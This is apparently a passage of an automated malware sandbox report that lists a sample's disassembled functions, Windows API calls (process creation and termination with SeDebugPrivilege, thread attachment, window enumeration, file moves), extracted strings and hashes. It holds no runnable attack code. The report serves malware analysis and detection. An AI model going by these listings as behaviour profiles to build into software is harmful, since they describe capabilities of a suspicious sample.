AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00330778,?,00000001), ref: 003317CC

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 67c51bf79e4ea5c483f40b1cbefcc91e68f202115ffdcb0cad7f704a4ecf9e54
Instruction ID: a256a0c8b82742e7fd2755088b4e4c4866c3dc9f35698775b80c32fd8321b45f
Opcode Fuzzy Hash: 67c51bf79e4ea5c483f40b1cbefcc91e68f202115ffdcb0cad7f704a4ecf9e54
Instruction Fuzzy Hash: 2D318D75624304BFEB139F24DCC8B797BADAB55712F154026F806E62E0D7759D408BA0

Function 0032A693 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,0032AA64), ref: 0032A9A2

Strings

NAME, xrefs: 0032A7D4
REGEXPCLASS, xrefs: 0032A767
CLASSNN, xrefs: 0032A744
CLASS, xrefs: 0032A721
TEXT, xrefs: 0032A8D9
INSTANCE, xrefs: 0032A8B0

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 2b52794d9e0f5fe09c9a4de58d89a530f655a3141ddf2f25e749f3a69312648b
Instruction ID: 60a85b0f7c58a539e9e64a7775136c4b9a065f21cd2866c3cdcb4d0beac93c6d
Opcode Fuzzy Hash: 2b52794d9e0f5fe09c9a4de58d89a530f655a3141ddf2f25e749f3a69312648b
Instruction Fuzzy Hash: 6291E830500A1AEBDB19EF60D481BF9FB74FF04344F51812AD98AA7141DF306A99CF91

Function 002D2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 002D2EAE

Part of subcall function 002D1DB3: GetClientRect.USER32(?,?), ref: 002D1DDC
Part of subcall function 002D1DB3: GetWindowRect.USER32(?,?), ref: 002D1E1D
Part of subcall function 002D1DB3: ScreenToClient.USER32(?,?), ref: 002D1E45

GetDC.USER32 ref: 0030CF82
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0030CF95
SelectObject.GDI32(00000000,00000000), ref: 0030CFA3
SelectObject.GDI32(00000000,00000000), ref: 0030CFB8
ReleaseDC.USER32(?,00000000), ref: 0030CFC0
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0030D04B

Strings

U, xrefs: 0030CF20

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 15af732e6ab60f3aa242e9cb7d4c8bfba81206b993b8108593176ee7d3e0c4eb
Instruction ID: f02b931a3da352bd08484e52fe2f59565157b1bf19aae597c89758c499d8cf87
Opcode Fuzzy Hash: 15af732e6ab60f3aa242e9cb7d4c8bfba81206b993b8108593176ee7d3e0c4eb
Instruction Fuzzy Hash: 2C710330401206EFCF228FA4C890AAA3BBAFF48350F14426AED555A2A6C7319C56DF61

Function 0034F9A8 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0034F9C9
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0034FB5C
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0034FB80
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0034FBC0
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0034FBE2
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0034FD5E
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0034FD90
CloseHandle.KERNEL32(?), ref: 0034FDBF
CloseHandle.KERNEL32(?), ref: 0034FE36

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 07876cad71c18e4710b1865ec777c3dfb6e890ec56511f78dd7912822bf36e40
Instruction ID: 30a796c4eab0302afd86583a4488481d0100d261531384b3520086c07391f813
Opcode Fuzzy Hash: 07876cad71c18e4710b1865ec777c3dfb6e890ec56511f78dd7912822bf36e40
Instruction Fuzzy Hash: AEE1B031204341DFC716EF24C891A6ABBE4AF85354F19896DF8898F2A2CB31EC54CF52

Function 002D201B Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 002D1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002D2036,?,00000000,?,?,?,?,002D16CB,00000000,?), ref: 002D1B9A

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002D20D3
KillTimer.USER32(-00000001,?,?,?,?,002D16CB,00000000,?,?,002D1AE2,?,?), ref: 002D216E
DestroyAcceleratorTable.USER32(00000000), ref: 0030BEF6
DeleteObject.GDI32(00000000), ref: 0030BF6C

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 2402799130-0
Opcode ID: e298a5f163905f0d80ff4dfa8f0e7d26d81c0a6814d351e16a18c7a6082d1cc9
Instruction ID: 911bb030c9b7cf7792520ba9bc24e058dfca6efe4dac967d950152ad75e56bdc
Opcode Fuzzy Hash: e298a5f163905f0d80ff4dfa8f0e7d26d81c0a6814d351e16a18c7a6082d1cc9
Instruction Fuzzy Hash: A761AE31126702DFCB26AF14CD59B2AB7F5FB60316F11842AE54287AB1C772ACA4DF50

Function 00334F63 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 003348AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003338D3,?), ref: 003348C7

Part of subcall function 003348AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003338D3,?), ref: 003348E0

Part of subcall function 00334CD3: GetFileAttributesW.KERNEL32(?,00333947), ref: 00334CD4

lstrcmpiW.KERNEL32(?,?), ref: 00334FE2
_wcscmp.LIBCMT ref: 00334FFC
MoveFileW.KERNEL32(?,?), ref: 00335017

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 86ffa41691a51c8c862d18f0ce214d035c6cd83df42856ff7fbba29abeb94555
Instruction ID: 56e35027947eb69278f04dd3bd88d2c79a8a89c8aa89e1aa4e447004a341ae16
Opcode Fuzzy Hash: 86ffa41691a51c8c862d18f0ce214d035c6cd83df42856ff7fbba29abeb94555
Instruction Fuzzy Hash: F45175B24087859BC725EB50C8C19DFB3ECAF85341F10492EB285D7151EF75A68C8B66

Function 003588B4 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0035896E

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 763d086e3a2252daedcd6191f6bdbbab98985594fe257af00d8a2ebdf57adc8a
Instruction ID: 6678067272ebb54d98ba590015be38212bae06c7e20900594ca501c439405439
Opcode Fuzzy Hash: 763d086e3a2252daedcd6191f6bdbbab98985594fe257af00d8a2ebdf57adc8a
Instruction Fuzzy Hash: 4351B330600244BFDF229F28CC89FA97B69FB05356F614116FD11F66B1DF71A9988B81

Function 002D2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0030C547
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0030C569
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0030C581
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0030C59F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0030C5C0
DestroyCursor.USER32(00000000), ref: 0030C5CF
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0030C5EC
DestroyCursor.USER32(?), ref: 0030C5FB

Part of subcall function 0035A71E: DeleteObject.GDI32(00000000), ref: 0035A757

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: CursorDestroyExtractIconImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2975913752-0
Opcode ID: ca9a8f985b1115e2e16c274935c470a2f453e387f1d1a33eca0c638f2ca861df
Instruction ID: 7072efde809f8707bafc76b52214e715cfcf2783aed45df0071925e086147b7b
Opcode Fuzzy Hash: ca9a8f985b1115e2e16c274935c470a2f453e387f1d1a33eca0c638f2ca861df
Instruction Fuzzy Hash: A7518C74620209EFDB21DF25CC45FAA77B9EB58351F11062AF802972E0DBB1ED90DB50

Function 00328E03 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00328A84,00000B00,?,?), ref: 00328E0C
RtlAllocateHeap.NTDLL(00000000,?,00328A84), ref: 00328E13
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00328A84,00000B00,?,?), ref: 00328E28
GetCurrentProcess.KERNEL32(?,00000000,?,00328A84,00000B00,?,?), ref: 00328E30
DuplicateHandle.KERNEL32(00000000,?,00328A84,00000B00,?,?), ref: 00328E33
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00328A84,00000B00,?,?), ref: 00328E43
GetCurrentProcess.KERNEL32(00328A84,00000000,?,00328A84,00000B00,?,?), ref: 00328E4B
DuplicateHandle.KERNEL32(00000000,?,00328A84,00000B00,?,?), ref: 00328E4E
CreateThread.KERNEL32(00000000,00000000,00328E74,00000000,00000000,00000000), ref: 00328E68

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
String ID:
API String ID: 1422014791-0
Opcode ID: d25fc612ed431ca1d06dd60c9da6d3a38395e2cd79d78d23ef283bb7c520f264
Instruction ID: 104e2c58648f6d481d55e629c11bf340d4a6f9c71889f014380cc1c99c84a074
Opcode Fuzzy Hash: d25fc612ed431ca1d06dd60c9da6d3a38395e2cd79d78d23ef283bb7c520f264
Instruction Fuzzy Hash: 3101BBB5640708FFE711ABB5DC4DF6B3BACEB89711F014421FA05DB1A1CA709900CB60

Function 00349428 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0034947C
VariantInit.OLEAUT32(?), ref: 0034954D
VariantInit.OLEAUT32(?), ref: 0034964E
VariantClear.OLEAUT32(?), ref: 00349658
VariantClear.OLEAUT32(?), ref: 003496B5

Strings

Null Object assignment in FOR..IN loop, xrefs: 003494DD, 0034960B, 003496C3
Incorrect Object type in FOR..IN loop, xrefs: 00349631

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: d76828a6623aca75b5db60386f8ef1a265abf247a9ba98f116a5d910f011a90a
Instruction ID: 847b4418cebb7331d296dacd60f781c3d3a30836b161fdb278ca1c1a90499f86
Opcode Fuzzy Hash: d76828a6623aca75b5db60386f8ef1a265abf247a9ba98f116a5d910f011a90a
Instruction Fuzzy Hash: 25917971A00219AFDF26DFA5C844FAFBBB8EF45320F11815AE515AF290D774A941CFA0

Function 00356FEF Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00357093
SendMessageW.USER32(?,00001036,00000000,?), ref: 003570A7
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003570C1
_wcscat.LIBCMT ref: 0035711C
SendMessageW.USER32(?,00001057,00000000,?), ref: 00357133
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00357161

Strings

SysListView32, xrefs: 00357065

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 6f922485671ac32aa48c27cbb676b469e0a878ec354c79366afedad5f0c2e1b0
Instruction ID: e43723b777c9731d80262f0e9e150c50e0a00b55bef051611799a27c4f0dde9c
Opcode Fuzzy Hash: 6f922485671ac32aa48c27cbb676b469e0a878ec354c79366afedad5f0c2e1b0
Instruction Fuzzy Hash: B5419171A04348AFDB229FA4DC85FEEB7E8EF08351F11056AF944A72E1D7719D888B50

Function 0034EC47 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00333E91: CreateToolhelp32Snapshot.KERNEL32 ref: 00333EB6
Part of subcall function 00333E91: Process32FirstW.KERNEL32(00000000,?), ref: 00333EC4
Part of subcall function 00333E91: CloseHandle.KERNEL32(00000000), ref: 00333F8E

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0034ECB8
GetLastError.KERNEL32 ref: 0034ECCB
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0034ECFA
TerminateProcess.KERNEL32(00000000,00000000), ref: 0034ED77
GetLastError.KERNEL32(00000000), ref: 0034ED82
CloseHandle.KERNEL32(00000000), ref: 0034EDB7

Strings

SeDebugPrivilege, xrefs: 0034ECD6

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: a62df6f4f0812a5741357ebed3b879f70c0d96525a249dc2551b16c3dd11f89b
Instruction ID: 2fc233069b8d16f20564637bd69b5fb79d45af711fff4303c9d3cd86d2edf3be
Opcode Fuzzy Hash: a62df6f4f0812a5741357ebed3b879f70c0d96525a249dc2551b16c3dd11f89b
Instruction Fuzzy Hash: 6141B8716002109FDB16EF24CC96F6EB7A4BF81714F188059F8429F2D2CBB4AC14CB92

Function 00333226 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 003332C5

Strings

blank, xrefs: 00333247
question, xrefs: 0033327E
info, xrefs: 00333266
stop, xrefs: 00333296
warning, xrefs: 003332AE

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 40ee35dd6bb5d6e588d2fc5081c85a4ff28acbc9e9686bc0d4c52d6394fa2376
Instruction ID: 442925321abbce415f98c7abb78fb2a73e4d420fe7ce86e12b1b0c2d0d48ee3b
Opcode Fuzzy Hash: 40ee35dd6bb5d6e588d2fc5081c85a4ff28acbc9e9686bc0d4c52d6394fa2376
Instruction Fuzzy Hash: 7B113A3120834ABBEB03AB54DCC3CABB39CDF193B0F20446AF504E6181E7B25B404AB5

Function 00348BC0 Relevance: 12.3, APIs: 8, Instructions: 324COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00348BEC
CoInitialize.OLE32(00000000), ref: 00348C19
GetRunningObjectTable.OLE32(00000000,?), ref: 00348D23
SetErrorMode.KERNEL32(00000001,00000029), ref: 00348E50
CoGetObject.OLE32(?,00000000,00362C0C,?), ref: 00348EA7
SetErrorMode.KERNEL32(00000000), ref: 00348EBA
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00348F3A
VariantClear.OLEAUT32(?), ref: 00348F4A

Memory Dump Source

Source File: 00000000.00000002.1661231308.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true

Associated: 00000000.00000002.1661216216.00000000002D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000038F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.000000000039C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661231308.00000000003FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661352212.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1661367752.0000000000405000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d0000_6ddrUd6iQo.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearInitInitializeRunningTable
String ID:
API String ID: 2437601815-0
Opcode ID: d02c26fb6fd3b7a00eab78fd3f49707af7cc5e990f6adf0f1ddd87eaa242046f
Instruction ID: d175249684343649daf35750f41fdd22fa2ebd04d9420c7da0058a3bb9ec7f16
Opcode Fuzzy Hash: d02c26fb6fd3b7a00eab78fd3f49707af7cc5e990f6adf0f1ddd87eaa242046f
Instruction Fuzzy Hash: 89C122B1608305AFC701EF64C88492BB7E9FF89748F00496DF98A9B261DB71ED45CB52

Function 00334534 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0033454E
LoadStringW.USER32(00000000), ref: 00334555
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0033456B
LoadStringW.USER32(00000000), ref: 00334572
_wprintf.LIBCMT ref: 00334598
MessageBoxW.USER32(00000000,?,?,00011010), ref: 003345B6

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00334593

Memory Dump Source

